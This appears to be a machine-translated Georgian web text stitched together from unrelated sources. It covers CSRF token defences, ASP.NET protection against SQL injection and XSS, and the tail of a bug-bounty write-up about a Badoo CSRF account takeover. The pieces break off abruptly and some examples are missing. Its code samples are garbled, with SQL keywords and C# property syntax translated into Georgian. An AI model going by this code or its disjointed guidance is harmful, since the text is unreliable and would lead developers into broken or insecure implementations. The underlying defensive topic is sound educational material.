ნაკრები-ქუქი: Csrf-token=i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; იწურება=ხუთ, 23-ივლ-2015 10:25:33 GMT; მაქსიმალური ასაკი=31449600; გზა =/

• კლიენტის მხარეს გაშვებული JavaScript კითხულობს მნიშვნელობას და აკოპირებს მას მორგებულ HTTP სათაურში, რომელიც გაგზავნილია ყოველი ტრანზაქციის მოთხოვნით

X-Csrf-ჟეტონი: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql

• სერვერი ამოწმებს ნიშნების არსებობას და მთლიანობას

ამ მეთოდის უსაფრთხოება ეფუძნება ვარაუდს, რომ მხოლოდ ერთი და იგივე საწყისის ფარგლებში გაშვებული JavaScript შეძლებს ქუქი-ფაილის მნიშვნელობის წაკითხვას. მოტყუებულ ფაილზე ან ელფოსტაზე გაშვებული JavaScript ვერ შეძლებს მორგებული სათაურის წაკითხვას და კოპირებას. მიუხედავად იმისა, რომ CSRF ნიშანი ქუქიებიავტომატურად გაიგზავნება თაღლითური მოთხოვნით, სერვერი მაინც ელოდება მოქმედ X-CSRF ჟეტონს სათაური .

თავად CSRF ჟეტონი უნდა იყოს უნიკალური და არაპროგნოზირებადი. ეს შეიძლება წარმოიქმნას შემთხვევით, ან შეიძლება იყოს მიღებული სესიის ტოკენებიდან HMAC-ის გამოყენებით:

Csrf_token = HMAC(sesion_token, application_secret)

CS ქუქის ჟეტონს არ უნდა ჰქონდეს HTTPOnly დროშა, რადგან ის განკუთვნილია JavaScript დიზაინით წასაკითხად.

ამ მეთოდს ახორციელებს მრავალი თანამედროვე ჩარჩო, როგორიცაა Django და AngularJS. იმის გამო, რომ ჟეტონი მუდმივი რჩება მომხმარებლის სესიის განმავლობაში, ის კარგად მუშაობს AJAX აპლიკაციებთან, მაგრამ არ უზრუნველყოფს მოვლენების თანმიმდევრობას ვებ აპლიკაციებში.

ამ მეთოდით გათვალისწინებული დაცვა შეიძლება ჩაიშალა, თუ სამიზნე ვებსაიტი გამორთავსმისი იგივე წარმოშობის პოლიტიკა ერთ-ერთი შემდეგი მეთოდის გამოყენებით:

• ნებადართული Access-Control-Allow-Origin სათაური (არგუმენტის ვარსკვლავით)
• clientaccesspolicy.xml ფაილი, რომელიც ანიჭებს უნებლიე წვდომას Silverlight-ის კონტროლზე
• crossdomain.xml ფაილი, რომელიც უზრუნველყოფს უნებლიე წვდომას ფლეშ ფილმებზე

ორმაგი გაგზავნა ქუქი

cookie-to-header მიდგომის მსგავსად, მაგრამ JavaScript-ის ჩართვის გარეშე, საიტს შეუძლია დააყენოს CSRF ჟეტონი, როგორც ქუქი და ჩასვას იგი დამალულ ველში კლიენტის მიერ გაგზავნილ ყველა HTML ფორმაში. როდესაც ფორმა გაიგზავნება, საიტს შეუძლია შეამოწმოს, რომ ქუქი-ტოკენი ემთხვევა ქუქიების ფორმას. საერთო წარმოშობის პოლიტიკა ხელს უშლის თავდამსხმელს წაიკითხოს ან დააყენოს ქუქი-ფაილები სამიზნე დომენზე, ამიტომ მათ არ შეუძლიათ სწორი ტოკენის შექმნილ ფორმაში ჩასმა.

ამ მეთოდის უპირატესობა სინქრონიზატორის შაბლონთან შედარებით არის ის, რომ ჟეტონი არ უნდა იყოს შენახული სერვერზე.

მომხმარებელთა გარანტიები

ბრაუზერის გაფართოებები, როგორიცაა RequestPolicy (Mozilla Firefox-ისთვის) ან Umatrix (როგორც Firefox-ისთვის, ასევე Google Chrome/Chromium-ისთვის) შეუძლია თავიდან აიცილოს CSRF ნაგულისხმევი უარყოფის პოლიტიკის მიწოდებით სხვადასხვა საიტების მოთხოვნებისთვის. თუმცა, ამან შეიძლება მნიშვნელოვნად შეაფერხოს მრავალი საიტის ნორმალურ მუშაობას. CsFire გაფართოებას (ასევე Firefox-ისთვის) შეუძლია შეამსუბუქოს CSRF-ის გავლენა ნორმალურ ბრაუზერზე ნაკლები ზემოქმედებით, ავთენტიფიკაციის ინფორმაციის წაშლით სხვადასხვა საიტების მოთხოვნიდან.

ASP.NET MVC არ არის ყველაზე პოპულარული, მაგრამ საკმაოდ პოპულარული სტეკი ვებ განვითარების გარემოში. (ანტი)ჰაკერების თვალსაზრისით, მისი სტანდარტული ფუნქციონალობა გაძლევთ უსაფრთხოების გარკვეულ საბაზისო დონეს, მაგრამ საჭიროა დამატებითი დაცვა ჰაკერული ხრიკების დიდი უმრავლესობისგან თავის დასაცავად. ამ სტატიაში ჩვენ გავაშუქებთ საფუძვლებს, რომლებიც ASP.NET-ის დეველოპერმა (იქნება ეს Core, MVC, MVC Razor თუ Web Forms) უნდა იცოდეს უსაფრთხოების შესახებ.

დავიწყოთ თავდასხმების ცნობილი ტიპებით.

SQL ინექცია

უცნაურად საკმარისია, მაგრამ 2017 წელს ინექცია და, კერძოდ, SQL ინექცია პირველ ადგილზეა "OWASP უსაფრთხოების რისკების ტოპ 10" შორის (Open Web Application Security Project). ამ ტიპის შეტევა გულისხმობს, რომ მომხმარებლის მიერ შეყვანილი მონაცემები გამოიყენება სერვერის მხარეს, როგორც შეკითხვის პარამეტრები.

კლასიკური SQL ინექციის მაგალითი უფრო სპეციფიკურია Web Forms აპლიკაციებისთვის. პარამეტრების გამოყენება შეკითხვის მნიშვნელობებად გვეხმარება თავდასხმებისგან დაცვაში:

String commandText = "განახლება მომხმარებლების სტატუსის დაყენება = 1 WHERE CustomerID = @ID;"; SqlCommand ბრძანება = new SqlCommand(commandText, connectionString); command.Parameters["@ID"].Value = customerID;

თუ თქვენ ავითარებთ MVC აპლიკაციას, მაშინ Entity Framework მოიცავს ზოგიერთ დაუცველობას. თქვენ უნდა მოახერხოთ SQL ინექციის მიღება, რომელიც მუშაობდა MVC / EF აპლიკაციაში. თუმცა, ეს შესაძლებელია, თუ თქვენ ასრულებთ SQL-ს ExecuteQuery-ით ან იძახებთ ცუდად დაწერილ შენახულ პროცედურებს.

მიუხედავად იმისა, რომ ORM თავს არიდებს SQL ინექციას (ზემოთ მოყვანილი მაგალითების გარდა), რეკომენდირებულია, რომ ატრიბუტები შემოიფარგლოს იმ მნიშვნელობებით, რომლებიც მოდელის ველებს და, შესაბამისად, ფორმებს შეუძლიათ მიიღონ. მაგალითად, თუ ვივარაუდებთ, რომ ველში მხოლოდ ტექსტის შეყვანაა შესაძლებელი, მაშინ გამოიყენეთ Regex დიაპაზონის დასაზუსტებლად ^+$ . და თუ ველში უნდა შეიყვანოთ ნომრები, მაშინ მიუთითეთ ეს, როგორც მოთხოვნა:

საჯარო სტრიქონის Zip (მიღება; დაყენება;)

ვებ ფორმებში შეგიძლიათ შეზღუდოთ მნიშვნელობები ვალიდაატორების გამოყენებით. მაგალითი:

მას შემდეგ, რაც .NET 4.5 ვებ ფორმები იყენებს შეუმჩნეველ ვალიდაციას. ეს ნიშნავს, რომ თქვენ არ გჭირდებათ დამატებითი კოდის დაწერა ფორმის მნიშვნელობის შესამოწმებლად.

მონაცემთა ვალიდაცია, კერძოდ, შეიძლება დაგვეხმაროს სხვა ცნობილი დაუცველობისგან დაცვაში, რომელსაც ეწოდება cross-site სკრიპტირება (XSS).

XSS

XSS-ის ტიპიური მაგალითია სკრიპტის დამატება კომენტარზე ან სტუმრების წიგნში. ეს შეიძლება ასე გამოიყურებოდეს:

როგორც გესმით, ამ მაგალითში, თქვენი საიტიდან ქუქი-ფაილები გადაეცემა პარამეტრად ზოგიერთ ჰაკერულ რესურსს.

ვებ ფორმებში, შეგიძლიათ დაუშვათ შეცდომა ასეთი კოდით:

Ბოდიში<%= username %>მაგრამ პაროლი არასწორია

გასაგებია, რომ მომხმარებლის სახელის ნაცვლად შეიძლება იყოს სკრიპტი. სკრიპტის შესრულების თავიდან ასაცილებლად, შეგიძლიათ გამოიყენოთ სხვა ASP.NET გამოთქმა: , რომელიც შიფრავს მის შინაარსს.

თუ ჩვენ ვიყენებთ Razor-ს, მაშინ სტრიქონები ავტომატურად იშიფრება, რაც ამცირებს XSS-ის დანერგვის შესაძლებლობას მინიმუმამდე - ჰაკერს შეუძლია ამის გაკეთება მხოლოდ იმ შემთხვევაში, თუ თქვენ დაუშვით უხეში შეცდომა, მაგალითად, გამოიყენეთ @Html.Raw(Model.username) ან გამოიყენეთ MvcHtmlString სტრიქონის ნაცვლად თქვენს მოდელში.

XSS-ისგან დამატებითი დაცვის მიზნით, მონაცემები ასევე დაშიფრულია C# კოდით. .NET Core-ში შეგიძლიათ გამოიყენოთ შემდეგი ენკოდერები System.Text.Encodings.Web სახელთა სივრციდან: HtmlEncoder , JavaScriptEncoder და UrlEncoder .

შემდეგი მაგალითი დააბრუნებს სტრიქონს 6 7 8

ძირითადად, როდესაც მსხვერპლი ატვირთავს გვერდს, ის უგზავნის მოთხოვნას Badoo-ს სკრიპტს, აითვისებს rt პარამეტრს ამ მომხმარებლისთვის და შემდეგ აკეთებს მოთხოვნას მსხვერპლის სახელით. ამ შემთხვევაში, ეს იყო მაჰმუდის ანგარიშის დაკავშირება მსხვერპლის ანგარიშთან, რაც საშუალებას აძლევდა ანგარიშის სრულად აღებას.

დასკვნები

სადაც არის კვამლი, არის ცეცხლი.აქ მაჰმუდმა შენიშნა, რომ rt პარამეტრი ბრუნდებოდა სხვადასხვა ადგილას, კონკრეტულ json პასუხებში. ასე რომ, მან სწორად გამოიცნო, რომ ის შეიძლებოდა აჩვენოთ სადმე, სადაც მისი გამოყენება შეიძლებოდა ამ შემთხვევაში js ფაილში.

შედეგები

CSRF შეტევები წარმოადგენს სხვა სახიფათო თავდასხმის ვექტორს და შეიძლება განხორციელდეს მსხვერპლის მცირე შეტყობინებით ან საერთოდ არ იყოს. CSRF მოწყვლადობის პოვნა მოითხოვს გარკვეულ გამომგონებლობას და, ისევ და ისევ, ყველაფრის გამოცდის სურვილს.

ზოგადად, ფორმები დაცულია ნაგულისხმევად ჩარჩოებით, როგორიცაა Rails, თუ საიტი აკეთებს POST მოთხოვნას, მაგრამ API-ებს შეუძლიათ

იყოს ცალკე ამბავი. მაგალითად, Shopify დაწერილია ძირითადად Ruby on Rails ჩარჩოზე, რომელიც ნაგულისხმევად უზრუნველყოფს CSRF დაცვას ყველა ფორმისთვის (თუმცა მისი გამორთვა შესაძლებელია). თუმცა, ცხადია, ეს სულაც არ არის საქმე ამ ჩარჩოთი აშენებული API-ებისთვის. დაბოლოს, ყურადღება მიაქციეთ ზარებს, რომლებიც ცვლის მონაცემებს სერვერზე (როგორიცაა წაშლის მოქმედება) და განხორციელდება GET მოთხოვნით.